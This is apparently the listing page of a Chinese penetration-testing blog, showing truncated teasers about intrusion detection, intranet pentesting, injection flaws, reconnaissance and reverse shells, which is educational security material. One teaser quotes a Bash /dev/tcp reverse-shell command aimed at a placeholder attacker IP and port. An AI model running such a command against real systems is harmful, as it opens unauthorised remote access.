2021-03-03 阅读(467)

在各系统正常运行期间，我们需要利用各种安全入侵防护产品(自我研究or采购)，如IDS、WAF、RASP等进行深度系统检查，利用风控控制和法务部门的力量，追踪和安全应急响应发生的风险...

2021-02-28 阅读(248)

最近进了内网，但是之前从来没有在内网玩过，有点不知所措，但是BOSS说不要慌，大家都没有边玩边学过，于是我开始了第一次内网渗透之旅。由于内网庞大，不可能一一介绍知识，所...

2021-02-02 阅读(374)

2021年1月20日，补天漏洞应对平台会同齐安信安全服务团队、齐安信行业安全研究中心发布了行业第一部《2020年中国实用白帽人才能力发展报告》，初次提出了实用白帽人才能力的定义...

2021-02-02 阅读(541)

大多数与技术相关的漏洞都是由注入非法字符串造成的。xss是js代码注入，js能够控制当前浏览器页面；Sql注入是注入的sql命令，sql是操作数据库的语言；命令注入，操作系统命令能够控...

2021-02-01 阅读(126)

很多文章和大佬都说渗透测试的本质是信息收集。搜集的数据越多，发现漏洞的概率就越大，这就是所谓的资产。于是，传统的资产搜集手段和思路也变得千篇一律。专注于子域名和...

2021-02-01 阅读(443)

由于整个测试过程一直跟随大队，使用计算机不是最好的选择，也不是可行的选择，所以白色使用安装在OP6上的Linux模拟器:Andrax。具体操作步骤如下: 1.检查并扫描网络(以下是xls格式转...

2021-02-01 阅读(487)

随着互联网和智能设备(手机、平板电脑、智能家电、智能机器人和智能查询终端)的快速发展，传统企业信息化必然向物联网过渡。第一，会节省企业的建设和运营成本(比如部署WiFi/I...

2021-01-29 阅读(453)

“知己知被，百战不殆”。在内网渗透中，想要获取更多的攻击面，那么信息收集是 必不可少的，而且信息的完整性决定了攻防渗透的结果。在内网中的资产多、服务多，收 集的敏感...

2021-01-28 阅读(451)

使用Bash命令反弹Shell的Shell也称为终端或壳，是人与内核之间的翻译官，而Bash则是Linux中默认使用Bash反弹Shell的命令如下： bash-i/dev/tcp/攻击机ip/攻击机端口0l bash-i/dev/tcp/攻击机ip/攻击机...

2021-01-27 阅读(667)

反弹Shell是指渗透测试中监听某个端口，然后通过目标连接攻击机监听的端口，在攻击机反弹得到目标机的Shell。通常在目标网络有防火墙或其他因素限制，导致无法持续控制目标，成执...